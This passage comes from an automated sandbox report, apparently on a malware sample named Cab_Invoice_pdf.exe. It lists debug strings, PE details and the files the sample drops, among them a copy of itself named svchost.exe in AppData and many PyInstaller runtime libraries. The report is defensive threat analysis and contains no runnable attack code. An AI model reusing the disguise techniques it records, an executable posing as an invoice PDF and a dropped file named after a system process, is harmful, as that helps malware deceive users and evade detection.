Source: Binary string: D:\a\1\b\bin\win32\python38.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.566602937.000000006E713000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.457664564.000000000301A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.487589642.0000000003B1A000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.439490901.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.395552475.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: Cab_Invoice_pdf.exe, 00000003.00000002.567205585.000000006EB3B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481773795.000000006DAEB000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.411685579.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.399919805.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568924352.000000006F2F3000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.390573271.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.567205585.000000006EB3B000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.389272849.0000000000E6C000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.481773795.000000006DAEB000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.393149261.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1i 8 Dec 2020built on: Tue Jan 5 20:17:31 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: Cab_Invoice_pdf.exe, 00000003.00000002.568469462.000000006EDAC000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.449130672.0000000002B7A000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.482692912.000000000377A000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.420047349.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 0000000B.00000003.397576219.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.430416405.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: svchost.exe, 0000000B.00000003.390148766.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 0000000B.00000003.403125486.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.399119703.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.441941698.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.407177237.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568546215.000000006EDF8000.00000002.00020000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.414456474.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.408682511.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 0000000B.00000003.395157867.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\pywintypes.pdb+ source: Cab_Invoice_pdf.exe, 00000003.00000002.568991542.000000006F30E000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.459130908.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.432280344.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.397132347.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.569138282.0000000070283000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.460241183.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb@@ source: Cab_Invoice_pdf.exe, 00000003.00000002.567385268.000000006EBD0000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.453594434.000000000295F000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.484471608.000000000355F000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568820397.000000006F2E5000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.388795347.0000000000E28000.00000004.00000001.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: svchost.exe, 0000000B.00000003.388243683.0000000000E6C000.00000004.00000001.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win32-3.8\Release\win32event.pdb source: Cab_Invoice_pdf.exe, 00000003.00000002.568721354.000000006F2D4000.00000002.00020000.sdmp, svchost.exe, 0000000B.00000003.465540156.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.396644442.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.426625427.0000000000E1B000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 0000000B.00000003.437644496.0000000000E1B000.00000004.00000001.sdmp
Source: Cab_Invoice_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Cab_Invoice_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Cab_Invoice_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Cab_Invoice_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Cab_Invoice_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01318356 push ecx; ret 1_2_01318369
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_01318356 push ecx; ret 3_2_01318369
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 3_2_6E2F50D4 push ecx; ret 3_2_6E2F50E6
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00BC8356 push ecx; ret 11_2_00BC8369
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_00BC8356 push ecx; ret 19_2_00BC8369
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA7DF66 push ecx; ret 19_2_6DA7DF79
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DA93266 push ecx; ret 19_2_6DA93279
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 19_2_6DABA456 push ecx; ret 19_2_6DABA469
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DAEA8D4 push ecx; ret 22_2_6DAEA8E6
Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 22_2_6DB0D4C4 push ecx; ret 22_2_6DB0D4D6
Source: libcrypto-1_1.dll.1.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.1.drStatic PE information: section name: .00cfg
Source: libcrypto-1_1.dll.11.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.11.drStatic PE information: section name: .00cfg
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeCode function: 1_2_01314740 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01314740
Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]

Persistence and Installation Behavior:

barindex
Drops PE files with benign system namesShow sources
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\libffi-7.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\libffi-7.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_overlapped.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\pyexpat.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\pywintypes38.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\pywintypes38.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\pywintypes38.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\win32event.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\libffi-7.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\win32api.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\win32gui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-file-l2-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\win32gui.pydJump to dropped file
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24122\ucrtbase.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\api-ms-win-core-util-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI63082\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61562\ucrtbase.dllJump to dropped file
